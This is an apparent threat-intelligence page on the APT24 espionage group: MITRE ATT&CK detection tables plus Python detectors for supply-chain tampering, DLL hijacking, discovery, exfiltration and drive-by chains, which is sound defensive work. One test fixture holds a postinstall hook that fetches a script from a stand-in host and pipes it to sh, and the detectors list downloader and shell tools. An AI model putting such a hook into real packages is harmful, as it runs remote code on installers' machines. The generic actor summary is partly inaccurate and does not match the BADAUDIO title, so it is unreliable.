
From Watering Holes to Supply Chains: How APT24 Scales Cyber Espionage with BADAUDIO
Summary of Actor: APT24, also known as 'Garden Panda', is a cyber espionage group believed to be operating out of China. The group primarily targets organizations in the aerospace, defense, and energy sectors. APT24 is known for its sophisticated phishing campaigns and the use of custom malware.

General Features: APT24 employs a combination of social engineering, spear-phishing, and custom malware to gain access to target networks. They are known for their persistence and ability to remain hidden in compromised networks for extended periods.

Related Other Groups: APT1, APT3, APT10

Indicators of Attack (IoA):
- Use of legitimate tools like PowerShell and Cobalt Strike
- Spear-phishing emails with malicious attachments
- Custom malware such as Beacon and HTTPBrowser

Recent Activities and Trends:

Latest Campaigns: APT24 recently launched a spear-phishing campaign targeting aerospace companies with a new strain of malware designed to exfiltrate sensitive information. The campaign involved the use of malicious Word documents containing macros.

Emerging Trends: APT24 has been observed increasing their use of living-off-the-land techniques, utilizing legitimate administrative tools to move laterally within networks. They have also begun to focus more on targeting supply chains in the aerospace and defense sectors.
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
REMEDIATION
T1059.007 - JavaScript
| ID | Name | Analytic ID | Analytic Description |
| | | | Detects JavaScript execution through WSH (wscript.exe, cscript.exe) or HTA (mshta.exe), particularly when spawned from Office macros, web browsers, or abnormal user paths. Correlates script execution with outbound network activity or system modification. |
| | | | Detects JavaScript for Automation (JXA) via osascript or compiled scripts using OSAKit APIs. Flags execution involving system modification, inter-process scripting, or browser abuse. |
| | | | Detects Node.js or JavaScript interpreter execution from web shells, cron jobs, or local users. Correlates execution with reverse shell behavior, file modifications, or abnormal outbound connections. |
T1195.001 - Compromise Software Dependencies and Development Tools
| ID | Name | Analytic ID | Analytic Description |
| | Supply-chain tamper in dependencies/dev-tools (manager→write/install→first-run→egress) | | Adversary manipulates dependencies/dev tools used by developers or CI: a package manager (npm/yarn/pnpm, pip/pipenv, nuget/dotnet, chocolatey/winget, maven/gradle) or a compiler/IDE downloads or restores content; files are written under project paths and execution paths (node_modules, packages, .nuget, .gradle, .m2, %AppData%\npm, %UserProfile%\.cargo\bin, temp build dirs). First run of newly written components triggers scripts (preinstall/postinstall), shell/PowerShell spawning, or loader DLLs, followed by network egress to non-approved registries/CDNs. |
| | | | Developer or CI invokes package managers/compilers (apt/yum + build-essential, npm/yarn/pnpm, pip/pip3, gem, cargo, go, maven/gradle). These write executable or script files into PATH or project dirs and immediately execute embedded lifecycle hooks (preinstall/postinstall, setup.py, npm scripts) that spawn shells or curl/wget, followed by egress to unfamiliar registries or domains. |
| | | | Developer tools (Homebrew, pip, npm/yarn, Xcode builds) install or update dependencies; new Mach-O or scripts appear under /usr/local, /opt/homebrew, ~/Library/Application Support, project dirs (node_modules/.bin, venv/bin). First run spawns sh/zsh/osascript/curl and new outbound flows; Gatekeeper/AMFI may flag unsigned components. |
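The first two stages of the chain above (package manager writes content, lifecycle hooks run on first install) can be gated before `npm ci` ever runs. The following is an added example, not code from the page or from any vendor: it scans a package.json for install-time hooks that spawn shells or downloaders, and a package-lock.json (v2/v3 layout, where each entry carries `resolved` and, when the package declares install hooks, `hasInstallScript`) for packages pulled from hosts outside an approved registry allowlist. The sample manifest, lockfile, registry allowlist and the `.invalid` hostnames are constructed for the example.

```python
"""Static pre-install checks for npm dependency tampering (T1195.001).

Added example. Inputs (package.json, package-lock.json, allowlist) are constructed.
"""
import json
import re
from urllib.parse import urlparse

# npm runs these hooks automatically around install; each is a first-run trigger.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "preprepare", "postprepare"}

# Commands an ordinary library has no business running from an install hook.
SUSPICIOUS_CMD = re.compile(
    r"\b(curl|wget|bash|sh|powershell|pwsh|cmd\.exe|certutil|bitsadmin)\b"
    r"|\bnode\s+-e\b|base64\s+(-d|--decode)|\beval\(",
    re.IGNORECASE,
)


def check_lifecycle_hooks(package_json: dict) -> list:
    """Return lifecycle hooks whose script body spawns a shell or downloader."""
    findings = []
    for hook, body in package_json.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue
        hit = SUSPICIOUS_CMD.search(body)
        if hit:
            findings.append({"hook": hook, "script": body, "matched": hit.group(0)})
    return findings


def check_lockfile_sources(lock: dict, allowed_hosts: set) -> list:
    """Return lockfile packages resolved from a host outside allowed_hosts.

    Uses the lockfile v2/v3 layout: lock["packages"][path] holds "resolved" and
    the optional "hasInstallScript" flag npm sets for packages with install hooks.
    """
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if not path:  # "" is the root project itself, not a dependency
            continue
        host = urlparse(meta.get("resolved", "")).hostname or ""
        if host and host not in allowed_hosts:
            findings.append({
                "package": path.rsplit("node_modules/", 1)[-1],
                "host": host,
                "has_install_script": bool(meta.get("hasInstallScript")),
            })
    return findings


# Constructed sample inputs: one tampered hook, one off-registry dependency.
SAMPLE_PACKAGE_JSON = {
    "name": "example-app",
    "scripts": {
        "build": "tsc -p .",
        "test": "jest",
        # constructed malicious hook: pulls and runs a remote script at install time
        "postinstall": "curl -s https://cdn.example.invalid/s.sh | sh",
    },
}
SAMPLE_LOCK = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app"},
        "node_modules/left-pad": {
            "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz"},
        "node_modules/fancy-logger": {
            "resolved": "https://mirror.example.invalid/fancy-logger-2.0.1.tgz",
            "hasInstallScript": True},
    },
}
ALLOWED_REGISTRIES = {"registry.npmjs.org"}  # assumption: the only approved registry


def run_checks(package_json=SAMPLE_PACKAGE_JSON, lock=SAMPLE_LOCK, allowed=ALLOWED_REGISTRIES):
    """Run both checks; a CI gate would fail the build on any non-empty list."""
    return {
        "hooks": check_lifecycle_hooks(package_json),
        "sources": check_lockfile_sources(lock, allowed),
    }


if __name__ == "__main__":
    print(json.dumps(run_checks(), indent=2))
```

The hook check is deliberately narrow (shells, downloaders, inline `node -e`, base64 decoding) so that legitimate native builds such as `node-gyp rebuild` pass; the lockfile check is the stronger signal, since a `resolved` URL pointing anywhere but the approved registry means the manager will write and execute content nobody reviewed.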
T1574.001 - DLL
| ID | Name | Analytic ID | Analytic Description |
| | | | DLL hijacking behaviors including unexpected DLL loads from non-standard directories, replacement of DLLs, phantom DLL insertion, redirection file creation, and substitution of legitimate DLLs. Defender correlates file system modifications, registry changes, and module load telemetry to detect abnormal DLL behavior in trusted processes. |
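Three of the behaviours in the row above (loads from non-standard directories, phantom/sideloaded system DLLs, and redirection-file creation) fall out of module-load and file-create telemetry alone. The following is an added example, not code from the page: it applies those rules to records shaped like Sysmon event 7 (ImageLoaded) and event 11 (FileCreate). The directory lists, the set of commonly sideloaded system DLL names, and the sample events are constructed assumptions for the example.

```python
"""Module-load and file-create rules for DLL hijacking (T1574.001).

Added example. Record layout mirrors Sysmon event 7 / event 11 field names;
all sample records are constructed.
"""
import ntpath
import re

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
TRUSTED_IMAGE_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Directories an unprivileged user can write to; a trusted binary should not load from here.
USER_WRITABLE = re.compile(
    r"^c:\\(users\\[^\\]+\\(appdata|downloads|desktop|documents)|programdata|windows\\temp|users\\public)\\",
    re.I,
)
# Assumed list: System32 libraries that are classic sideloading/phantom-DLL names.
KNOWN_SYSTEM_DLLS = {
    "version.dll", "dwmapi.dll", "cryptbase.dll", "wininet.dll", "userenv.dll", "profapi.dll",
    "dbghelp.dll", "uxtheme.dll", "propsys.dll", "winmm.dll", "msimg32.dll", "sspicli.dll",
}


def _norm(path):
    return path.replace("/", "\\").lower()


def analyze_image_load(ev):
    """Reasons a single ImageLoaded record looks like a hijack (empty list if benign)."""
    image, module = _norm(ev["Image"]), _norm(ev["ImageLoaded"])
    mod_dir = ntpath.dirname(module) + "\\"
    mod_name = ntpath.basename(module)
    reasons = []
    if mod_name in KNOWN_SYSTEM_DLLS and not mod_dir.startswith(SYSTEM_DIRS):
        reasons.append(f"system DLL {mod_name} loaded from non-system path {mod_dir}")
    if image.startswith(TRUSTED_IMAGE_DIRS) and USER_WRITABLE.match(module):
        reasons.append("trusted binary loaded a module from a user-writable directory")
    if ev.get("Signed") == "false" and image.startswith(TRUSTED_IMAGE_DIRS):
        reasons.append("unsigned module loaded into a trusted-path process")
    return reasons


def analyze_file_create(ev):
    """DotLocal redirection: an <app>.exe.local file forces DLL loads from the app directory."""
    target = _norm(ev["TargetFilename"])
    if target.endswith(".exe.local"):
        return [f"DLL redirection file created: {target}"]
    return []


# Constructed telemetry: a sideload in a vendor directory, a benign system load,
# a phantom cryptbase.dll fed to svchost from Temp, and a .local redirection file.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Program Files\Vendor\Tool\tool.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\Tool\version.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Windows\System32\dwmapi.dll", "Signed": "true"},
    {"EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\cryptbase.dll", "Signed": "false"},
    {"EventID": 11, "Image": r"C:\Users\alice\AppData\Local\Temp\drop.exe",
     "TargetFilename": r"C:\Program Files\Vendor\Tool\tool.exe.local"},
]


def run(events=SAMPLE_EVENTS):
    """Apply the per-event rules and return one alert per event with findings."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 7:
            reasons = analyze_image_load(ev)
        elif ev["EventID"] == 11:
            reasons = analyze_file_create(ev)
        else:
            reasons = []
        if reasons:
            alerts.append({"image": ev["Image"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in run():
        print(a["image"], "->", "; ".join(a["reasons"]))
```

The "known system DLL outside a system directory" rule is the one with the best signal-to-noise ratio; the user-writable and unsigned rules are broader and are best used to raise the score of an event that already tripped the first rule or to catch a DLL name not on the list.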
T1082 - System Information Discovery
| ID | Name | Analytic ID | Analytic Description |
| | | | Process creation and command-line execution of native system discovery utilities such as systeminfo, hostname, wmic, or use of PowerShell/WMI for system enumeration. |
| | | | Execution of system enumeration commands such as uname, df, uptime, hostname, lscpu, and cat /etc/os-release through local terminal or scripts. |
| | | | Execution of system info utilities like systemsetup, sw_vers, uname, or sysctl by terminal or scripted processes. |
| | | | Execution of esxcli system hostname get, esxcli system version get, or esxcli hardware commands through SSH or local shell. |
| | | | Use of cloud API calls (e.g., AWS EC2 DescribeInstances, Azure VM Inventory) to enumerate system configurations across assets. |
| | | | Execution of show version, show hardware, or show system commands through CLI via SSH or console. |
T1059 - Command and Scripting Interpreter
| ID | Name | Analytic ID | Analytic Description |
| | Behavioral Detection of Command and Scripting Interpreter Abuse | | Detects the execution of scripting or command interpreters (e.g., powershell.exe, cmd.exe, wscript.exe) outside expected administrative time windows or from abnormal user contexts, often followed by encoded/obfuscated arguments or secondary execution events. |
| | | | Detects use of shell interpreters (e.g., bash, sh, python, perl) initiated by users or processes not normally executing them, especially when chaining suspicious utilities like netcat, curl, or ssh. |
| | | | Detects launch of command-line interpreters via Terminal, Automator, or hidden osascript, especially when parent process lineage deviates from user-initiated applications. |
| | | | Detects use of 'esxcli system' or direct interpreter commands (e.g., busybox shell) invoked from SSH or host terminal unexpectedly. |
| | | | Identifies CLI interpreter access (e.g., Cisco IOS, Juniper JUNOS) via enable mode or scripting-capable sessions used by uncommon accounts or from unknown IPs. |
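The T1082 rows above list discovery utilities, and the T1059 rows describe interpreter launches outside admin windows, from abnormal parents, or with encoded arguments. Both are command-line analytics over process-creation events, so one added example (not code from the page) covers them: it decodes PowerShell `-EncodedCommand` payloads (base64 of UTF-16LE text) so discovery commands hidden inside them still count, flags interpreter launches by parent, encoding and time of day, and reports sessions that run several distinct discovery commands within a short window. The command lists, the admin-window hours and the sample events are assumptions constructed for the example.

```python
"""Discovery-burst (T1082) and interpreter-abuse (T1059) analytics over
process-creation records. Added example; all records are constructed.
"""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

DISCOVERY_CMDS = {"systeminfo", "hostname", "whoami", "wmic", "ipconfig", "net", "uname",
                  "df", "uptime", "lscpu", "sw_vers", "sysctl", "systemsetup", "esxcli"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "bash", "sh", "zsh", "python", "python3", "perl", "osascript"}
OFFICE_AND_BROWSERS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe",
                       "chrome.exe", "msedge.exe", "firefox.exe", "acrord32.exe"}
ADMIN_HOURS = range(8, 20)  # assumption: 08:00-19:59 is the approved admin window
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Decoded text of a PowerShell -EncodedCommand argument, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def discovery_tokens(cmdline):
    """Discovery utilities named in the command line, decoded payload included."""
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded:
        text += " " + decoded
    found = set()
    for tok in re.split(r"[\s;&|]+", text):
        name = _basename(tok).removesuffix(".exe")
        if name in DISCOVERY_CMDS:
            found.add(name)
    return found


def interpreter_findings(ev):
    """Reasons an interpreter launch looks abusive; empty for non-interpreters."""
    image = _basename(ev["image"])
    if image not in INTERPRETERS:
        return []
    reasons = []
    parent = _basename(ev["parent"])
    if parent in OFFICE_AND_BROWSERS:
        reasons.append(f"{image} spawned by {parent}")
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded is not None:
        reasons.append(f"encoded command decodes to {decoded!r}")
    hour = datetime.fromisoformat(ev["time"]).hour
    if hour not in ADMIN_HOURS and not ev.get("is_admin", False):
        reasons.append(f"run at {hour:02d}h outside the admin window by {ev['user']}")
    return reasons


def discovery_bursts(events, window=timedelta(seconds=120), threshold=3):
    """Sessions running >= threshold distinct discovery commands inside one window."""
    by_session = defaultdict(list)
    for ev in events:
        toks = discovery_tokens(ev["cmdline"])
        if toks:
            by_session[ev["session"]].append((datetime.fromisoformat(ev["time"]), toks))
    bursts = []
    for session, items in by_session.items():
        items.sort(key=lambda it: it[0])
        for i, (t0, _) in enumerate(items):  # slide the window from each command
            seen = set()
            for t, toks in items[i:]:
                if t - t0 > window:
                    break
                seen |= toks
            if len(seen) >= threshold:
                bursts.append({"session": session, "start": t0.isoformat(), "commands": sorted(seen)})
                break
    return bursts


# Constructed sample: a 03:12 PowerShell launched by Word with an encoded payload,
# followed by whoami and wmic in the same session; then a daytime admin hostname check.
ENC = base64.b64encode("systeminfo; hostname".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"time": "2024-05-01T03:12:05", "user": "corp\\jdoe", "session": "s1",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENC}"},
    {"time": "2024-05-01T03:12:40", "user": "corp\\jdoe", "session": "s1",
     "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\whoami.exe",
     "cmdline": "whoami /all"},
    {"time": "2024-05-01T03:13:10", "user": "corp\\jdoe", "session": "s1",
     "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic os get caption,version"},
    {"time": "2024-05-01T10:30:00", "user": "corp\\admin1", "session": "s2", "is_admin": True,
     "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c hostname"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["time"], interpreter_findings(ev))
    print(discovery_bursts(SAMPLE_EVENTS))
```

A single `hostname` from an administrator during the day produces nothing, while the encoded, Word-spawned, off-hours PowerShell produces three findings on its own and its decoded payload also counts toward the session's discovery burst, which is the correlation the T1059 row describes as "encoded/obfuscated arguments or secondary execution events".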
T1041 - Exfiltration Over C2 Channel
| ID | Name | Analytic ID | Analytic Description |
| | | | Identifies suspicious outbound traffic volume mismatches from processes that typically do not generate network activity, particularly over C2 protocols like HTTPS, DNS, or custom TCP/UDP ports, following file or data access. |
| | | | Monitors for processes reading sensitive files then immediately initiating unusual outbound connections or bulk transfer sessions over persistent sockets, particularly with encrypted or binary payloads. |
| | | | Detects unauthorized applications or scripts accessing sensitive data followed by establishing encrypted outbound communication to rare external destinations or with abnormal byte ratios. |
| | | | Detects VMs sending outbound traffic through non-standard services or to unknown destinations, including exfiltration over reverse shells tunneled via VMkernel or custom payloads routed via hostd/vpxa. |
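The four rows above share one shape: a process with no outbound baseline, a sensitive read shortly before the send, an upload-heavy byte ratio, and a rare destination. The following is an added example, not code from the page: it scores per-process outbound flows against file-access telemetry on those four signals (plus a large-outbound-over-DNS check for the DNS case named in the first row) and alerts only when at least two coincide. The baselines, sensitive-path pattern, thresholds and sample telemetry are assumptions constructed for the example.

```python
"""Exfiltration-over-C2 scoring (T1041) from file reads plus per-process flows.

Added example; baselines, thresholds and telemetry are constructed.
"""
import re
from datetime import datetime, timedelta

# Assumed baselines: images that normally talk out, and their usual destinations.
BASELINE_NET_IMAGES = {"chrome.exe", "outlook.exe", "teams.exe", "svchost.exe"}
BASELINE_DESTINATIONS = {"outlook.office365.com", "update.example-corp.internal"}
SENSITIVE_PATH = re.compile(r"(\\|/)(finance|hr|legal)(\\|/)|\.(pst|kdbx|pem|ppk)$", re.I)
READ_TO_SEND_WINDOW = timedelta(minutes=5)
UPLOAD_RATIO = 10.0            # bytes_out / bytes_in above this is upload-heavy
MIN_UPLOAD_BYTES = 1_000_000   # ignore small flows for the ratio rule
DNS_UPLOAD_BYTES = 50_000      # port-53 flows rarely carry this much outbound


def _img(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ts(s):
    return datetime.fromisoformat(s)


def score_flow(flow, file_reads):
    """Reasons one outbound flow looks like exfiltration (empty if none)."""
    reasons = []
    image, t = _img(flow["image"]), _ts(flow["time"])
    if image not in BASELINE_NET_IMAGES:
        reasons.append(f"{image} has no outbound baseline")
    if flow["dst"] not in BASELINE_DESTINATIONS:
        reasons.append(f"destination {flow['dst']} not in baseline")
    ratio = flow["bytes_out"] / max(flow["bytes_in"], 1)
    if flow["bytes_out"] >= MIN_UPLOAD_BYTES and ratio >= UPLOAD_RATIO:
        reasons.append(f"upload-heavy: {flow['bytes_out']} out / {flow['bytes_in']} in (ratio {ratio:.0f})")
    if flow["dst_port"] == 53 and flow["bytes_out"] >= DNS_UPLOAD_BYTES:
        reasons.append(f"{flow['bytes_out']} bytes out over DNS")
    # Same process read a sensitive file within the window before this flow began.
    recent = [r["path"] for r in file_reads
              if r["pid"] == flow["pid"] and SENSITIVE_PATH.search(r["path"])
              and timedelta(0) <= t - _ts(r["time"]) <= READ_TO_SEND_WINDOW]
    if recent:
        reasons.append("sensitive read(s) shortly before send: " + ", ".join(recent))
    return reasons


# Constructed telemetry: an updater in Roaming reads finance data and a password
# database, then pushes 48 MB over HTTPS and 640 KB over DNS; Chrome is benign.
UPDATER = r"C:\Users\jdoe\AppData\Roaming\svc\updater.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
FILE_READS = [
    {"time": "2024-05-01T14:01:10", "pid": 4120, "image": UPDATER, "path": r"\\fileserver\finance\Q2-forecast.xlsx"},
    {"time": "2024-05-01T14:01:12", "pid": 4120, "image": UPDATER, "path": r"C:\Users\jdoe\Documents\vault.kdbx"},
    {"time": "2024-05-01T14:00:00", "pid": 2210, "image": CHROME, "path": r"C:\Users\jdoe\Downloads\report.pdf"},
]
FLOWS = [
    {"time": "2024-05-01T14:03:30", "pid": 4120, "image": UPDATER, "dst": "cdn-sync.example.invalid",
     "dst_port": 443, "bytes_out": 48_000_000, "bytes_in": 120_000},
    {"time": "2024-05-01T14:05:00", "pid": 4120, "image": UPDATER, "dst": "ns1.example.invalid",
     "dst_port": 53, "bytes_out": 640_000, "bytes_in": 30_000},
    {"time": "2024-05-01T14:02:00", "pid": 2210, "image": CHROME, "dst": "outlook.office365.com",
     "dst_port": 443, "bytes_out": 90_000, "bytes_in": 3_500_000},
]


def find_exfil(flows=FLOWS, file_reads=FILE_READS, min_reasons=2):
    """Alert on flows where at least min_reasons signals coincide."""
    alerts = []
    for f in flows:
        reasons = score_flow(f, file_reads)
        if len(reasons) >= min_reasons:
            alerts.append({"pid": f["pid"], "image": _img(f["image"]), "dst": f["dst"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in find_exfil():
        print(a["image"], "->", a["dst"])
        for r in a["reasons"]:
            print("   ", r)
```

Requiring two coinciding signals keeps a lone "unknown destination" from paging anyone, while the read-then-send correlation is what separates a bulk upload to a backup service from the pattern in the second and third rows; the DNS rule is volume-based on purpose, since tunnelled exfiltration is not visible in the query names alone.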
T1189 - Drive-by Compromise
| ID | Name | Analytic ID | Analytic Description |
| | Drive-by Compromise — Behavior-based, Multi-platform Detection Strategy (T1189) | | Correlated evidence of anomalous browser/network behavior (suspicious external resource fetches and script injection patterns) followed by atypical child processes, ephemeral execution contexts, memory modification or process injection, and unexpected file drops. Defender sees network requests to previously unseen/suspicious domains or resources + browser process spawning unusual children or loading unsigned modules + file writes or registry changes shortly after those requests. |
| | | | Correlated evidence of browser or webview fetches to uncommon domains or mutated JS resources (proxy/NGFW logs + Zeek/HTTP logs) followed by unexpected interpreters or script engines executing (python, ruby, sh) spawned from browser processes or user sessions, rapid on-disk staging in /tmp, and outbound connections that deviate from baseline. Defender sees: uncommon resource fetch → short-lived child process executions from user browser context → file writes in temp directories → anomalous outbound C2-like connections. |
| | | | Correlated evidence where Safari/Chrome/WebKit-based processes issue network requests for uncommon or obfuscated JS resources followed by spawning of script interpreters, launchd or ad-hoc binaries, unusual child processes, or dynamic library loads into browser processes. Defender sees: proxy/HTTP logs with suspicious resource content + unifiedlogs/ASL showing browser/plugin crashes or extension loads + process events indicating child process creation and file writes to /var/folders or /tmp shortly after the fetch. |
| | | | Post-compromise identity & session anomalies that follow a drive-by compromise: token reuse from new/unfamiliar IPs, anomalous sign-in patterns for previously inactive users, unexpected consent/grant events, or provisioning changes. Defender sees an endpoint/browser compromise (network + endpoint signals) followed by unusual IdP events: new refresh token issuance, consent/consent-grant events, odd MFA bypass patterns, or unusual OAuth client registrations. |
T1105 - Ingress Tool Transfer
| ID | Name | Analytic ID | Analytic Description |
| | | | Unusual or uncommon processes initiate network connections to external destinations followed by file creation (tools downloaded). |
| | | | Shell-based tools (curl, wget, scp) initiate connections to external domains followed by creation of executable files on disk. |
| | | | Process execution of curl or wget followed by a network connection and a file created in temporary or user-specific directories. |
| | | | Command line interface or vCLI triggers remote transfer using wget or curl, writing files into datastore paths or local tmp directories. |
| | | | Network device logs show anomalous inbound file transfers or uncharacteristic flows with high payload volume to network devices with storage or automation hooks. |
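The T1189 rows (browser spawns a script host, then egress, then a temp-directory drop), the T1059.007 row (wscript/cscript/mshta spawned from Office or a browser and correlated with outbound activity) and the T1105 rows above (curl/wget connects out, then an executable lands in a temp path) all describe the same lineage correlation, so one added example serves all three; it is not code from the page. It walks constructed endpoint telemetry (process, netconn and filecreate records), treats a script host or downloader launched by a browser/Office parent, or any downloader, as a chain root, then gathers egress to domains absent from the baseline and executable drops in temp paths from the root and its descendants inside a short window. The parent/child lists, temp-directory patterns, baseline domains and sample events are assumptions constructed for the example.

```python
"""Process-lineage correlator for drive-by, script-host and tool-transfer chains
(T1189, T1059.007, T1105). Added example; all telemetry below is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

BROWSERS_AND_OFFICE = {"chrome.exe", "msedge.exe", "firefox.exe", "winword.exe", "excel.exe",
                       "outlook.exe", "safari", "google chrome", "firefox"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe",
                "rundll32.exe", "sh", "bash", "zsh", "python", "python3", "osascript", "node"}
DOWNLOADERS = {"curl", "curl.exe", "wget", "certutil.exe", "bitsadmin.exe", "scp"}
BASELINE_DOMAINS = {"update.example-corp.internal", "cdn.example-corp.internal"}
# Windows, Linux and macOS staging directories named in the rows above.
TEMP_DIR = re.compile(r"(\\appdata\\local\\temp\\|\\windows\\temp\\|\\downloads\\|"
                      r"^/tmp/|^/var/tmp/|^/dev/shm/|^/var/folders/|^/private/tmp/)", re.I)
EXEC_EXT = re.compile(r"\.(exe|dll|scr|js|jse|vbs|hta|ps1|sh|py|bin|so|dylib)$", re.I)
WINDOW = timedelta(minutes=3)


def _img(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ts(s):
    return datetime.fromisoformat(s)


def _descendants(root, children):
    """root plus every transitive child pid."""
    out, stack = {root}, [root]
    while stack:
        for c in children.get(stack.pop(), []):
            if c not in out:
                out.add(c)
                stack.append(c)
    return out


def correlate(events, window=WINDOW):
    """Return one alert per chain root that reached at least one later stage."""
    procs = [e for e in events if e["type"] == "process"]
    children = defaultdict(list)
    for p in procs:
        children[p["ppid"]].append(p["pid"])
    alerts, covered = [], set()
    for p in procs:
        if p["pid"] in covered:          # already reported as part of an earlier chain
            continue
        img, parent = _img(p["image"]), _img(p["parent_image"])
        if parent in BROWSERS_AND_OFFICE and (img in SCRIPT_HOSTS or img in DOWNLOADERS):
            root = f"{parent} spawned {img}"
        elif img in DOWNLOADERS:
            root = f"downloader {img} launched by {parent}"
        else:
            continue
        t0, family = _ts(p["time"]), _descendants(p["pid"], children)
        stages = [root]
        for e in events:
            if e.get("pid") not in family or not (timedelta(0) <= _ts(e["time"]) - t0 <= window):
                continue
            if e["type"] == "netconn" and e["dst"] not in BASELINE_DOMAINS:
                stages.append(f"egress to unseen domain {e['dst']} (pid {e['pid']})")
            elif e["type"] == "filecreate" and TEMP_DIR.search(e["path"]) and EXEC_EXT.search(e["path"]):
                stages.append(f"executable dropped in temp path {e['path']} (pid {e['pid']})")
        if len(stages) >= 2:
            alerts.append({"root_pid": p["pid"], "image": img, "stages": stages})
            covered |= family
    return alerts


CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
# Constructed telemetry: Chrome fetches a baseline CDN and an ad host, spawns mshta,
# which fetches a staging domain and launches PowerShell that writes a DLL to Temp;
# later a Linux shell pulls a script into /tmp with curl.
SAMPLE_EVENTS = [
    {"type": "process", "time": "2024-05-01T09:00:00", "pid": 100, "ppid": 1,
     "image": CHROME, "parent_image": r"C:\Windows\explorer.exe"},
    {"type": "netconn", "time": "2024-05-01T09:00:05", "pid": 100, "dst": "cdn.example-corp.internal"},
    {"type": "netconn", "time": "2024-05-01T09:00:06", "pid": 100, "dst": "ads-static.example.invalid"},
    {"type": "process", "time": "2024-05-01T09:00:08", "pid": 4321, "ppid": 100,
     "image": r"C:\Windows\System32\mshta.exe", "parent_image": CHROME},
    {"type": "netconn", "time": "2024-05-01T09:00:09", "pid": 4321, "dst": "stage.example.invalid"},
    {"type": "process", "time": "2024-05-01T09:00:10", "pid": 4400, "ppid": 4321,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe"},
    {"type": "filecreate", "time": "2024-05-01T09:00:14", "pid": 4400,
     "path": r"C:\Users\jdoe\AppData\Local\Temp\upd.dll"},
    {"type": "process", "time": "2024-05-01T11:30:00", "pid": 2000, "ppid": 1999,
     "image": "/usr/bin/curl", "parent_image": "/bin/bash"},
    {"type": "netconn", "time": "2024-05-01T11:30:01", "pid": 2000, "dst": "files.example.invalid"},
    {"type": "filecreate", "time": "2024-05-01T11:30:02", "pid": 2000, "path": "/tmp/.x/agent.sh"},
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(a["image"], "(pid", a["root_pid"], ")")
        for s in a["stages"]:
            print("   ", s)
```

Chrome's own connections never appear in an alert because the browser is not a chain root; only what its script-host child and that child's descendants do inside the window is collected, which is the "browser process spawning unusual children" plus "file writes shortly after those requests" correlation the T1189 row describes. The curl chain shows the T1105 shape with no browser involved at all.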